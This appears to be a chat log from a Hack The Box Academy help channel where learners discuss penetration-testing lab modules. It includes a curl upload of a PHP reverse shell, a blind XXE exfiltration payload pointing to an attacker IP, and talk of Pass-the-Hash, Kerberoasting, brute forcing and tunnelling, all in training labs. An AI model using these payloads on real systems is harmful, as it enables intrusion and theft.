#modules

1 messages Β· Page 75 of 1

fathom pendant
#

In different applications

sick mural
#

Ok checking it

#

Can i pasteca screen shot of log here

mystic light
#

try something simpler first, like a webshell. validate your hypothesis. then, what can you do with a webshell and command execution?

hexed swan
#

Having issues downloading the flag on teir 0 module 2 'Fawn" idk if it's a issue but it denies me permission

#

anyone know by chance?

muted pulsar
#

You need to put /hijacking after the IP address in the browser

fathom pendant
#

For screebshots

fathom pendant
sick mural
#

How may i verify the account can you guide please

fathom pendant
#

(yes two separate logins)

alpine mural
#

Hi, I'm having issues with the File Upload Attacks module, specifically with the Upload Exploitation section. I can't get the PHP reverse shell I uploaded to connect to my port on the attacking machine.

I have made sure that the IP and port I provide are correct and that the port I listen on with nc is the same as in the script. The pentestmonkey script and the one generated by Metasploit in the module haven't worked for me.

I've been stuck here for about a month and I don't know what else to do. Any ideas or if someone has experienced a similar issue, how did you solve it?

glacial hazel
#

do you have a firewall setup

mystic light
alpine mural
alpine mural
glacial hazel
#

but lmk if you need additional help, a month is too long prayge

next ledge
#

Hey does anyone have some good tools for working with keepass? I don't need to crack the password just wondering if there are some cli stuff to work with the db.

glacial hazel
deep mason
#

cool i just finished the introduction to htb, where should i start learning next?

mystic light
deep mason
#

Oh that's great! Thank you very much!

next ledge
glacial hazel
next ledge
#

I am trying to mount it for the Password attacks lab -hard.

#

I am using kali

steady hawk
#

Just mount it on a Windows VM, you'll save yourself a lot of trouble..

fathom pendant
next ledge
#

I will try windows and I think that john cracked the password.

fathom pendant
#

Much easier to mount on a win VM

#

Or windows system

safe falcon
#

Hi, I'm in the 'Attacking Common Services' module in the 'DNS Attack' section. I managed to obtain the subdomain 'h?.inlanefreight.htb', but I need some help because when I execute the command 'dig AXFR @h?.inlanefreight.htb inlanefreight.htb', I get the following result: 'dig: unable to get address for 'h?.inlanefreight.htb': not found'. πŸ™‚

fathom pendant
#

Because you need to dig @ ip subdomain

safe falcon
next ledge
#

worked like a charm

fathom pendant
#

This isn't the place to ask please read #rules and #welcome ; if it's a live ctf challenge usually it's against rules to get outside help. If you have peers doing the challenge, ask them

glacial hazel
#

everybody is different

#

every module is different πŸ˜›

#

don't worry about how fast you get through a module

#

just make sure you are understanding everything

raw belfry
#

Using SSH for the first time got me feelin different πŸ’€

naive field
#

hey guys im on password attack module attacking ad & ntds sectin

#

i make a user files and they look like this

#

but when i run it i get this everytime

#

is this how its supposed to be?

steady hawk
#

You should specify the absolute path ./names.txt and you are missing the -p flag before your passwords wordlist

naive field
#

thanks ill try rn

naive field
karmic dagger
#

Does anyone have insight on the RDP and SOCKS Tunneling with SocksOverRDP module? I'm trying to run the SocksOverRDP-Plugin.dll from the Windows machine, but the file automatically deletes after it is extracted from the .zip file. I checked Windows Defender and it is turned off.

fathom pendant
#

It's bad to base your personal performance and progress based on others. However long it takes you to grasp a concept is fine. Sometimes it's a wording issue with the question that leaves you a tiny bit confused

sweet roost
#

h

dense ferry
#

If you still need help, feel free to dm

autumn pilot
karmic dagger
#

I’m sure I’m missing something obvious, but I’m having issues figuring out the password for the ssh account in the Skills Asignment-Pivoting, Tunneling, and Port Forwarding module. I read the for-admin-eyes-only file, but the phrase in the file isn’t the password for ssh. I tried logging into ssh using the id_rsa file and the provided username, but that doesn’t work either.

#

Never mind. I figured it out.

sick mural
broken crystal
#

what is the event about?

grand bane
#

hello guys, can I dm someone to help me with Exploiting Web Vulnerabilities in Thick-Client Applications in the **Attacking Common Applications ** module ?

#

this is the last section i have left and i can't finish it πŸ‘Ί

fair mesa
#

Hello ! I need help on putting a webshell on the module "Attacking Common Services" on section easy lab "Attacking Common Services - Easy"
So I sent my webshell in PHP and even in ASPX (shell.php and shell.aspx) on the TARGETIP/xampp\htdocs\shell.php directory, and when I try to execute it via my browser it puts me a white page... can someone help me please?

weak charm
weak charm
fair mesa
weak charm
grand bane
grand bane
fair mesa
#

curl -k -X PUT -H "Host: 10.129.203.7" -H "Content-type: text/php" --basic -u fiona:9*** -F 'fileX=@/usr/share/webshells/php/php-reverse-shell.php' https://10.129.203.7/php-reverse-shell.php I used this btw and in verbose mode it tells me it sent correctly and when I curl it it's ok !

#

I tried many webshells in php aspx and a reverse shell but I don't think this is the problem now

fair mesa
#

I'm blocked for days if anyone could help me.
The target is a windows using XAMPP APACHE.
I have the creds of a SMTP user.
I managed to upload files using curl -X PUT method using smtp creds
I have these info files found on the ftp server: cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

cat docs.txt
I'm testing the FTP using HTTPS, everything looks good.

past garden
#

Can someone help me with broken authentication final skill assessment? I either didn't find the correct user name or role to access the admin panel

tender shuttle
#

I'm taking notes in Notion, but I'm having a problem where the child node is aligned same with the parent node. Does anyone know how to fix this issue in Notion?

past garden
#

Nevermind, I found a hint in the forum

past garden
heady tusk
short pasture
#

Hi all, is there an admin I can talk to? It is pretty urgent

copper steppe
#

got a question....

#

I have tried "Linux Debian".After checking the hint, I typed penguin ....but all these are wrong

#

(why i cant upload a picture? (Β° ^ °〃)

fathom pendant
fathom pendant
grim matrix
#

hi, in the Bloodhound module, I'm almost certain I've got the correct answer for "Using BlueHound custom dashboard. Which computer has more Administrators?" but it's not accepted. my mistake; I re-ran sharphound and got a different answer that wasn't showing up before.

fair mesa
fair mesa
#

Nice πŸ™‚

copper steppe
#

i really dont know what to write.....

fair mesa
#

getting information on a command is "man [command]",
try getting information with "uname" command

copper steppe
#

he told me just type "uname -a"

#

and the hint is "it's the name of a bird"

#

i just..."what the hell (Β° ^ °〃)"

fair mesa
#

Oh ok it's this question, uname doesn't give the flavor of the system idk why, but every linux distribution like "Ubuntu" etc has a Animal SYMBOL

livid pier
#

@iron canopy Helpful hints for the first thick client challenge on attacking common applications. when dumping the file pay special attention to what the TYPE and SIZE the file is. @modern epoch , pay attention to what the question is asking. for the flag? or password? or something else?

royal current
fair mesa
livid pier
fair mesa
#

before it I found a user password for ftp, smtp and mysql. so the goal was to find a way to send a webshell or reverse shell but i don't know why it makes a white page every time I navigate to it

livid pier
#

Alright give me a minute to spin it up

fair mesa
livid pier
#

Im going to dm yoou

#

lol no money tho

flint laurel
#

Attacking Common Applications - WordPress - Discovery & Enumeration

Hello guys, please, someone can give me a hint ??? on this question β€œPerform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).”

autumn pilot
#

enumerate the different pages

heady tusk
zenith gazelle
#

I have some questions in module "ATTACKING COMMON SERVICES" in section "Attacking SQL Databases" can you send a DM to someone?

ionic summit
half shell
#

Can someone help me the question "What is the customized version of the POP3 server?"

I solved other questions in this section, but that I can not understand what question means....

Module: Footprinting
IMAP / POP3
Question: What is the customized version of the POP3 server?

zenith gazelle
half shell
zenith gazelle
#

try banner grabbing, you need a especific version vx.xxx

zenith gazelle
obtuse verge
#

Can someone help me? I have a problem in the Password Attcks (Pass the ticket from Windows). I cant connect to the RDP, this one specifically. I can connect to every other RDP or anything else. I dont know if in the only one with this problem. I already finished this module unless this content...

fathom pendant
heady tusk
ember iron
#

hey guys im a beginner in hackthebox, can someone tell me what i need to learn and do in hackthebox to become better at cyber security and learn more

#

i have 0 knowledge, a friend of mine said use hackthebox to learn IT. but im a beginner and know nothing

zenith gazelle
autumn pilot
ember iron
zenith gazelle
# ember iron i have 0 knowledge, a friend of mine said use hackthebox to learn IT. but im a ...

I didn't study the fundamentals courses on hack the box, so I can't speak, but working in the industry and knowing other people it was better to start with tryhackme.com

You have to know how a network works, an operating system, a database, programming in general, how the internet works, etc.
I highly recommend starting with tryhackme.com they have a lot of free stuff and it's also cheap and you'll learn everything from scratch.

zenith gazelle
ember iron
fathom pendant
obtuse verge
fathom pendant
#

/v: ?

#

Or /v{IP} because without the colon it will fail

obtuse verge
#

yeah, im using that

#

mb

fathom pendant
fathom pendant
obtuse verge
#

still not working

fathom pendant
#

Sometimes with special characters you may need to either put in quotes or use a backslash

#

For instance \$\$ because $ in bash indicates a variable call

obtuse verge
#

ok, its working with '

#

thank you!!

fathom pendant
#

Np :)

#

It helps to recognize certain characters as potential fuckery for commands

#

!,$,&,>,<,?

#

They may need to be escaped with a backslash

#

Or the whole string in quotes

heady tusk
gentle root
#

Someone nudge on Attacking Common Services - Easy? Got USN F* but can't brute-force password for FTP or pop3, I thought the hint was leaning towards SMTP server type deal -- Used PW.list and rockyou we're an hour in rn with 48threads

royal current
autumn pilot
gentle root
rustic sage
#

Hi, I have a question about If I want to start a capture without hostname resolution, detailed output, showing ASCII and hexadecimal contents, and take the first 100 packets; what are the switches used? Please answer in the order in which the switches are requested in the question.

I have tried several ways but I have no correct answer I have read the documentation.

#

Module Intro to Network Traffic Analysis

mystic light
gentle root
#

Like is it realistic to ever need to brute force with -t1 because even with t-1 if account lockout is low it doesn't matter lol

rustic sage
#

@autumn pilot sudo tcpdump -rXX /tmp/capture.pcap Reading the recent documentation but I see why I have done the test and it does give me the correct information but at the time of the answer it is incorrect.

autumn pilot
#

it is expecting one switch (parameter)

#

if you carefully read the question again, you will be able to find the answer using even with the manual that I've linked

rustic sage
#

@autumn pilot I think the answer I am applying is correct, what I think is wrong is how I am applying it.

autumn pilot
#

if it is not getting accepted, then it is not the expected one

rustic sage
#

@autumn pilot You are right

dull coral
#

yo

mystic light
# gentle root Gotcha, it's that even realistic though

i mean... all ctfs are contrived examples based on real world misconfigurations, right? but account lockout is different than login throttling. throttling is reducing the amount of simultaneous or repeated attempts by rejecting new logins. where a lockout is "youve tried unsuccessfully too many times, an administrator must unlock your account (or wait an hour before the next attempt)."
i was managing a security team where a pentest was conducted and the attacking team just did a low and slow ping from various ip's, just under what would trip the account lockout. 3 here, 3 there, 3 there or whatever. they eventually found a valid password but were thwarted by MFA.
so there is utility to it, but i will concede that it is definitely a contrived example, and if your pw is in the ass half of rockyou, youre gonna be waiting around for a while.

dull coral
#

noice

rustic sage
#

@autumn pilot I believe that when the questions are complex is when you learn to memorize concepts the most.

fathom pendant
mystic light
fathom pendant
#

Like if you wanted to sim rl... Then yeah you'd need to reset the lab a couple times

#

With -t1

brave sail
#

shoutout to @mortal basin, this modules are dope

coral sundial
#

Hi all (my turn πŸ™‚ ) Currently on the last official question on the Passwords Attack module on the passthehash section. The question is:

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I am logged in as admin on RDP and have used Julio's hash (confirmed through mimikatz. I can get the command to execute on DC01 but don't get any reverse shell. Been on this for hours and tried a number of different rev shells:

#

Any help is appreciated

gentle root
#

Someone PM a hint on getting the webshell on Attacking Common Services - Easy. Exploited FTP with USN and PSW and uploaded a shell (i think) and can't seem to get anything back from it

mystic light
heady tusk
coral sundial
#

I have used the recommended revshells. My port is 4444 and the IP is my tun0

heady tusk
#

tun0 of your machine or some IP of the host you RDP'd to?

coral sundial
#

Sorry - my mistake - habit. The IP of the MS01 that I am RDP'd on to

coral sundial
#

Did I not just say? It's the ip of the target I'm currently rdp'd on to. Unless you want the actual ip address?

heady tusk
coral sundial
#

Yes it can and it does. I did try the secondary IP address with no luck.

woeful ermine
#

it problably in this subnet 172.16.5.0/23

coral sundial
#

DC = 172.16.1.10 2nd IP Client 172.16.1.5

heady tusk
#

it has a public IP address (the one they gave to you), and an internal one. DC01 is only able to reach the internal one, so you definitely need that one. should be like 172.16.x.x

#

If the internal IP doesn't work, dm me. I'll take a closer look then to figure out what else might have gone wrong

coral sundial
#

Just tried it with the internal IP with no luck.

heady tusk
#

ugh

coral sundial
#

I'm definite I tried it earlier as well

#

Let me DM you πŸ™‚

#

If you have some time

heady tusk
past garden
#

Hi, I'm having an issue in Bypassing Security Filters exercise of Web Attacks. It looks like the skill assessment is somehow broken. I'm supposed to put something in an filename input and press RESET. Looking at the call in BURP, the value in the filename is nowhere to be found.

#

Or maybe the wrong machine is spawned? It always shows me the flag from the previous exercise

#

The input and the button are in different forms πŸ€”

mystic light
past garden
#

wtf

#

I'll try

past garden
#

I'm still lost. I found the method which isn't recognized as malicious request and expect now to see the flag file, but I don't

mystic light
past garden
#

thx

karmic dagger
#

For the Skills Assignment-Pivoting, Tunneling, and Port Forwarding, how did you transfer mimikatz to the target pivot machine to dump the credentials? I tried scp from my attacking machine and using powershell from the target machine, but it doesn’t connect. I’m executing the commands using proxychains and am able to RDP to the target machine I found through autoroute.

steady hawk
#

It hasn't been updated in 4 years, whether it's archived or not, nothing has changed. There's also EyeWitness.

steady hawk
ionic summit
#

I use gowitness. Works just fine.

fathom pendant
#

aquatone isn't necessary Β―_(ツ)_/Β―

rustic sage
#

when gowitness implemented the server feature

πŸ‘Œ

celest light
#

someone else having connections issues with the academy?

velvet pawn
#

same here "500 SERVER IS NOT FEELING WELL"

celest light
#

yup

humble shell
#

Yeah I can't log in either

glacial hazel
#

it's part of the box

celest light
#

haha

old wren
#

yup, same, error 500

agile rapids
#

makes me wonder if it was hacked

surreal perch
#

Hi every1 is there any issues with academy server >>>throwing http-code-500 ???onionthink

half shell
zinc hemlock
#

same

icy nest
#

same

agile rapids
#

keep trying

#

its just droping requests

icy nest
#

up !

zinc hemlock
#

πŸ‘

gentle root
#

Sheeesh

queen hatch
#

Is academy dashboard down for anyone else?

Nvm. I see some other people are

wanton mica
#

Looks like everyone is having the same issue πŸ˜…

Well anyways, how is everyone’s day/night going?

queen hatch
#

Pretty good. Just watchin Grimm atm

turbid hull
#

I feel like shit but it's kinda like a normal morning

woeful ermine
#

AD Enumeration & Attacks - Skills Assessment Part I . I am having hard time with the question 6. It is asking t*** user's cleartext password. I am connecting MS01 with rdp over proxychains but when I try secretsdump.py and mimikatz.py I am getting this error

#

[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.5.50:445 <--socket error or timeout!
[-] [Errno Connection error (172.16.5.50:445)] [Errno 111] Connection refused

#

I tried both of these with chisel but non of them work ----./chisel.exe client -v 10.10.X.X:1234 R:socks ------- ./chisel.exe client 10.10.X.X:1234 R:139:127.0.0.1:139 R:445:127.0.0.1:445 R:3389:127.0.0.1:3389. Any ideas ?

solar zodiac
#

is anyone having trouble with academy

#

i keep getting a 500 error

woeful ermine
#

it happened to me

solar zodiac
#

"server is not feeling well"

#

lol

#

its a funny error message

woeful ermine
#

yep, lol

solar zodiac
#

ironically i was feeling under the weather today

#

so now I feel like the universe is trolling me πŸ˜„

sly parcel
#

@woeful ermine @solar zodiac they are investigating

solar zodiac
#

ah

languid fjord
#

Informed the team, might take a minute due to the late hour

#

will share any updates when i hate them

inland raft
#

Thanks.

rustic sage
languid fjord
#

Will share what information i can when i have more

barren escarp
#

NMAP module from HTB Academy says an "NMAP Connect Scan (-sT) is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports. "

I find this confusing because if the firewall drops incoming packets (the initial syn packet) then the firewall wouldn't send an outgoing (syn-ack) anyways. So why is it saying a connect scan can bypass a firewall?

turbid hull
#

Dans la chaleur, de la nuit πŸ€’

languid fjord
turbid hull
#

Sorry

languid fjord
#

All good πŸ™‚

weary shoal
#

Any updates on the 500? πŸ™‚

#

oh nvm it's working now πŸ˜„

gentle root
#

It works and then it doesn't

inland raft
#

lol

#

I'm headed to bed hopefully won't be an issue tomorrow.

candid ocean
#

Hey all, just had a query with the SNMP Footprinting exercise which asks you to enumerate a script and submit its output as the answer, now I stumbled accross the answer by going for a walk, however I am curious how it's "meant" to be done. Can Braa be used to brute force OIDs for x.sh and can you then somehow execute a script from an OID.

fathom pendant
#

Walk is intended answer route

candid ocean
#

oh it is? Cheers Marcie - just didnt seem to really 'match' what the question was hinting at

kind holly
#

how to do this , i am using ffuf and seclists as a wordlists ----Don't forget to remove copyrights from the wordlist, they clutter the results!

glacial hazel
#

vi <wordlist>

#

dd on comments

#

:wq

kind holly
sinful olive
#

Hi guys please help me.. I have this weird problem in #WEB ATTACKS - Blind Data Exfiltration

I am able to get any file except from the file they asked for in the question...
What is missing??

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://MY_IP:8000/327a6c4304ad5938eaf0efb6cc3e53dc.php">
%remote;
%oob;
%content;
]>
<root>&content;</root>

heady tusk
#

Dm me if you still need a hint

heady tusk
willow heron
#

Hello guys i just have silly question is there a way i can know machine tags? for example MetaTwo has XXE, sqli etc? or if the machine has web app?

heady tusk
# barren escarp NMAP module from HTB Academy says an "NMAP Connect Scan (-sT) is also useful whe...

I'd assume what they mean by this is:
If a port is open, it will reply with an ACK. The firewall won't block that as it would be disrupting the service.
On other ports it'll drop the SYN, so nmap will get no reply. It'll then retry to rule out packet loss.
If it's no packet loss, you can safely assume the port is filtered or closed.

The firewall may also reply with some ICMP stuff, which nmap will once again interpret as port filtered.

willow heron
dim hound
#

I am doing Kerberos attacks module, I am currently at the Kerberoasting question. What is Adam's password, a Kerberoastable account? I identified 3 user account.. but the Adam one. Can someone provide me with a nudge?

steady hawk
dim hound
#

ohhh shit πŸ˜‚ @steady hawk Thanks! I used the wrong script 😁

rustic sage
#

Hello anyone could help me out with lfi module

dim hound
rustic sage
#

Automation one

dim hound
#

Which question

rustic sage
#

I found the parameter and found many paths but I don't know how to get to race from there

dim hound
#

Which question mate, then I can take a look at mine notes

rustic sage
#

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

rustic sage
#

That I did it I found many paths now what I think is go through log poisonning maybe?

rustic sage
#

Okay thanks a lot think I know what to do 😁

rustic sage
#

I thought it was the answer to this question, but it's not... sudo tcpdump -i eth0 -rXX /tmp/capture.pcap Given the capture file at /tmp/capture.pcap, what tcpdump command will enable you to read from the capture and show the output contents in Hex and ASCII? (Please use best practices when using switches) lol module tcpdump fundamentals

rustic sage
#

Can someone help me with the question I'm stuck

autumn pilot
#

I gave you the link to the manual, you need a simple search to do

rustic sage
#

IΒ΄m reading the documentatio but itΒ΄s so hard πŸ™‚

glacial hazel
#

you can also use hexdump to look at pcap files

rustic sage
#

But it will display the content in hex ascii

sleek urchin
rustic sage
#

The question itself is not difficult but I think the most complex thing is to make the correct practice, in the manual the -r switch says "Read packets from file (which was created with the -w option or by other tools that write pcap or pcapng files). The standard input is used if the file is ``"-'' and the switch XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.

autumn pilot
#

if you search for Hex and ASCII you will find the answer

rustic sage
#

-XX When parsing and printing, in addition to printing the headers of each packet, it prints the data of each packet, including its link-level header, in hexadecimal and ASCII.

#

And doing a correct practice of the switches would be sudo tcpdump -rXX /tmp/capture.pcap

autumn pilot
#

close ||sudo tcpdump -Xr /tmp/capture.pcap||

rustic sage
#

isnΒ΄t correct

#

no yet

#

First it would be to read from the capture and then display the hex ascii content. πŸ™‚

#

whyyyyyyy is good

#

@autumn pilot But I tried several times that command and I got failure

#

@autumn pilot I mean it should display the content first in hexa and ascii and then read the capture to display the content?

#

hi

#

this is the community for hackers?

glacial hazel
glacial hazel
rustic sage
#

guys is black arch better than kali

#

when it comes to pen testing/ hacking

glacial hazel
rustic sage
#

btw do you know any tool that is very secret or very low no. of people knew about that

glacial hazel
#

Yeah sudo written in rust

rustic sage
#

btw im new in hacking world

#

if anyone can teach me something about hacking than it would be very good for me

#

also im planning to get a server and i wanna do some pen testing on it before i put it to acctual use

#

btw anyone knew how to hack any device without coming in contact with that device in physically

dim hound
rustic sage
#

is this safe link?

dim hound
#

Yes, it's the link to HackTheBox Academy

#

Sending malicious links isn't allowed ; )

glacial hazel
#

Challenge accepted

rustic sage
#

@glacial hazel I think it's more like organizing the switches in order to execute them correctly because I've read a couple of times the manufacturer's documentation and it explains it in simple terms

glacial hazel
#

What are you trying to do?

rustic sage
#

IΒ΄m learning tcp fundamentals

#

Module Intro to Network Traffic Analysis (fundamentals tcpdump)

glacial hazel
#

Are you trying to display the contents of a pcap file in hex and ascii?

rustic sage
#

yes

glacial hazel
#

hexdump -C <file>

rustic sage
#

Ok

#

It is a bit overwhelming all the information because I have to study it little by little.

glacial hazel
#

yes πŸ˜›

rustic sage
#

I am now with the following question but I am thinking about how I should arrange the switches so that it accepts the response

#

sudo tcpdump -nvvXc 100 but so hard And yet the question indicates that they should be organized as requested in the statement.

rustic sage
#

This isn't a question in how to complete the activity just was curious about getting to the answer. In the Password Attacks - Credential Hunting in Linux ||why are the creds you are looking for contained in someone else's personal configs? i feel like the activity took me longer because the last place i'd think to look for user B's creds is in user A's personal configs. I guess in the future i should assume someone's creds could be in anyone's personal configs||

fathom pendant
thorn urchin
#

also humans just be dumb and its not weird for coworkers to have each others passwords even if theres no actual good or authorized reason for them to have it

#

"Hey I know youre out of town but I need that file you were working on."
"Np, password is P@$$w0rd! lol"
"Thanks! I wrote it down just in case!'
"Sounds good πŸ‘"

fathom pendant
#

^

#

Even when things are explicitly against policy, humans go "lol ok but I need this done"

inland raft
#

πŸ’€

naive field
#

im on attacking module and on creds harvestinw indows

#

i am supposed to transfer a file from a attack host to target

#

through rdp, im on remmina rn and idk how to do it

#

cant finda any potions

#

options

#

i can use smbserver.py but i wanna see how to do it through rdp

#

thanks :D

fathom pendant
#

Not sure with remmina but iirc if you add, /drive:<any name>,<full filepath or ./ For current> to mount a share when you connect

#

But I'm sure there's a Remmina option to mount a filepath

#

With xfreerdp*

#

Yeah there's an option in Remmina GUI "share folder"

rustic sage
fathom pendant
#

Yes

#

Β―_(ツ)_/Β―

#

It happens dude

naive field
#

im on pw attack and on question find the default pw

#

for every new account

#

and i cant find s*it

#

i tried running the script

#

and the cmd

#

and looker around

#

but no lol

#

looked*

#

idk whatelse to do

mystic light
#

pop a cmd prompt and run the onlineliner in the module.

jaunty sail
#

Hello,I have a question about the "Skills Assessment - Using Web Proxies" module on CBBH path, last question I need to capture the request sent by Metasploit. I have no problem doing it with burp suite so i already have the answer, but i can't find a way to catch it with Owasp Zap, there is a previous exercise in the module where i had the same problem. Can't we do it with zap ? I enabled my 127.0.0.1:8080 proxy in zap options but nothing is captured when I run metasploit exploit.

wanton oxide
#

guys hello ive just came here i need your helps immadeitly how can i delete my data from the internet

#

if i delete social media and email accs does that really deleted?

gentle root
#

uh

#

Sounds like a question for reddit

#

Hey - So I think I know the answer but if a module is updated I need to complete to 100% again before I take exam once I'm completely done right?

peak hamlet
#

Hi lads, if any one knows the answer for this, in evil-winrm when we execute the command "download" from target machine to download it to our attacker machine, i cannot seem to find the file in my attacker machine, any idea where it is actually downloaded?

gentle root
# peak hamlet

I'd assume your current directory lol but you could just use the find command for it πŸ™‚

steady hawk
#

Yea, it should be in the directory in which you launched evil-winrm from

peak hamlet
#

yeah that is what i also know.. but it is just not there πŸ˜„

gentle root
#

Where is it lol

peak hamlet
#

nobody knows πŸ˜„

gentle root
#

dog lol

peak hamlet
#

upload works just fine.. like put the file in the same directory as evil-winrm and it uploads.. πŸ˜„

gentle root
#

maybe check ls -alh or whatever and see if it's hidden for some reaosn

peak hamlet
#

tried that as well , no luck in finding it 😦

#

this is not the first time i face this, it happen always.. download does not work accordingly

peak hamlet
gentle root
#

I'ts okay, Marcie here for the rescue πŸ™‚

fathom pendant
fathom pendant
#

I'm not familiar enough with winrm to help

#

It should be the filepath you're currently in

#

But Im not 100%

#

From documentation ```
Notes about paths (upload/download): Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path. If you are using Evil-WinRM in a docker environment, bear in mind that all local paths should be at /data and be pretty sure that you mapped it as a volume in order to be able to access to downloaded files or to be able to upload files from your local host O.S.

peak hamlet
fiery robin
#

Anybody know what's going on here?
I'm stuck on module ATTACKING COMMON APPLICATIONS: Splunk - Discovery & Enumeration

#

when I when to the Splunk's port it says "The connection was reset"

fiery robin
#

oh thx

#

but what's the difference between using https and connecting directly?

pine dagger
#

@acoustic owl you recently finished the NoSQL injection module, I'm hitting a blank on skill assessment 1. Any hint for what I should be doing?

acoustic owl
pine dagger
#

Hrmm. I used that and I've got it to login, no issue, but just a bit puzzled as to what to do afterwards

acoustic owl
#

If you do it right, you should get the answer directly in Burp

naive field
#

got bunch of crap

#

lol

sleek urchin
#

doing AD: Living Off the Land

#

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

#

any help ?

naive field
heady tusk
mystic light
thin harbor
#

Hello everyone
Please help with the LINUX PRIVILEGE ESCALATION module .
I have a task where I need to find 2 files that contain SETUID bits and write them as an answer.
I found 2 files in the system, but only one is suitable, what am I doing wrong?

naive field
thin harbor
#

htb-student@NIX02:/usr/lib/snapd$ find / -uid 0 -perm -6000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/bin/facter
htb-student@NIX02:/usr/lib/snapd$

#

Help me please 😦

thin harbor
mystic light
safe falcon
#

Hello, I am in the "KERBEROS ATTACKS" module, in the "Kerberos Authentication Process" section, regarding the (AP-REQ) Application Request part. I believe there is an error in the diagram: the content of the TGS (Ticket Granting Service) ticket is encrypted with the service key, not with the new user/service session key

naive field
sleek urchin
safe falcon
naive field
#

im stuck on this bs for like 2hrs

#

only on this q

mystic light
heady tusk
naive field
#

because some sections though this path were really unnecessary complicated

#

and i get stuck for hours....

mystic light
#

password attacks is one of the roughest modules fr

naive field
#

i dont mind getting stuck and shit but sometimes its just too much

#

like it takes a day jsut to do one section...

mystic light
#

ok dm me ill walk you through it

naive field
mystic light
#

and youll slap yourself in the forehead im telling you

naive field
#

yeah bro it was the first one

#

its just i got like 1000 of them outputed

#

and i couldnt scroll all the way up

#

so i had to put that shi in the file and read it..

dim hound
jolly dagger
#

In the Active Directory Enumeration Module, Kerberoasting - from Windows section, I'm having issues with the following command: New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"

PSArgumentException
TypeNotFound

acoustic owl
#

zonetransfer.me is the domain from which you request a zone transfer and nsztm1.digi.ninja is the Nameserver that you request

young mica
#

@naive field fr... bt mostly its because maybe your machine got nothing to enough resources

naive field
half shell
#

I bruteforced domain via dnsenum... but I can not find FQDN for .203.... Can someone give me hint or help me?

M: Footprinting(DNS)
Q: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

jaunty sail
#

if i remember you need to find the subdomain that allow a zone transfer, and then bruteforce this subdomain,and i think you can use the subdomains-top1million-5000.txt

#

spent a lot of time on this one ^^

#

Btw I have a question about the "Skills Assessment - Using Web Proxies" module on CBBH path, last question I need to capture the request sent by Metasploit. I have no problem doing it with burp suite so i already have the answer, but i can't find a way to catch it with Owasp Zap, there is a previous exercise in the module where i had the same problem. Can't we do it with zap ? I enabled my 127.0.0.1:8080 proxy in zap options but nothing is captured when I run metasploit exploit.

glacial hazel
#

You could capture it with wire shark

jaunty sail
#

well it work with burp suite, but i wanted to make it work with owasp zap too 😦

acoustic owl
jaunty sail
#

can't find the reason why

acoustic owl
#

Two reasons
First, the number of requests to a DNS server may be limited.
Second, not every list contains every entry

glacial hazel
naive field
#

i started the http python server on my machine

#

but when i try to wget from ssh i get this

#

wtf

glacial hazel
#

what command did u use to start the server

naive field
#

its working now

glacial hazel
#

based

naive field
#

idk what the prob was :D

#

thanks anyways

scenic plover
#

Default port is 8000 if you just ran python3 -m http.server. I was going to say it looks like you might have forgotten http://IP:port/

naive field
#

yeaah that was the prob i think

#

thanks

#

!!

#

i kinda feel like im the most boring person in this channel xd

#

i ask all the time..

scenic plover
#

Nah, it's a learning experience, so don't be a afraid to ask. But if you can google it first and try to find it, that's worth it's weight in the skill. I'd say figuring out how to google things the right way can really come in handy in the future.

naive field
peak thistle
#

Is the 1'000 cube (approx. 90$) justified for the OSINT corporate Records course? Anybody would recommend or think there is similar but cheaper material?

dim hound
#

Hmmm I did PowerView module.. it’s decent but tbh I expected a little bit more from it

scenic plover
# naive field yeah, i just feel i get stuck a lot more than other ppl here :D

If it bothers you at all you should ask yourself why you get stuck. It sounds stupid, but that's how I approach things now. Like if you do an AS-REP roast. Why will it work on one account vs another? What's the setting that enables this and why would it be enabled? Why is it valuable finding? Sometimes you just have to go out and research the concept despite the material you're provided in academy.

foggy light
#

Module Active Directory PowerView
Section Enumerating AD Groups
Q. Find the member of the Remote Management Users group on WS01

.\SharpView.exe Get-NetLocalGroupMember -ComputerName WS01

Doesnt show members of Remote Management Users

Tried using a different approach

.\SharpView.exe Get-NetGroupMember -GroupName "Remote Management Users" -ComputerName WS01

Still no result

grave shell
#

Hi! Can anyone assist me with Predictable token reset? Currently stuck here. (Nevermind ❀️ )

acoustic owl
foggy light
#

@acoustic owl have you done that module? Active Directory Powerview

acoustic owl
#

Yes

foggy light
#

Can I DM you?

acoustic owl
#

sure

static roost
#

#Windows Privilege Escalation
#Section: DNSAdmins
#Using Mimilib.dll
I've been able to recreate all of the examples in the lab. All except the Mimilib.dll method mentioned. I read the URL link provided, but it doesn't give much detail into this attack method other than mentioning kdns.c(adding system command). Am I supposed to compile this and run the binary on the host? Do I have to compile mimikatz and run it with a special command? Can anyone offer more details?

barren escarp
#

Anyone do the Network Enumeration with NMAP module yet? I'm stuck on the Firewall and IDS/IPS Evasion - Medium Lab

red current
#

I can't make anything out of the Intercepting Web Requests section in Using Web Proxies. I can't seem to get Zap to work at all and when I try to forward requests in Burp Suite, nothing happens. Anyone else run into these issues in this section?

#

It just keeps taking me back to hitting the ping button and when I change the 1 to ls and hit forward, it's just a blank window.

#

I tried in the pwnbox as well and it does the same thing.

barren escarp
#

Yes

scenic plover
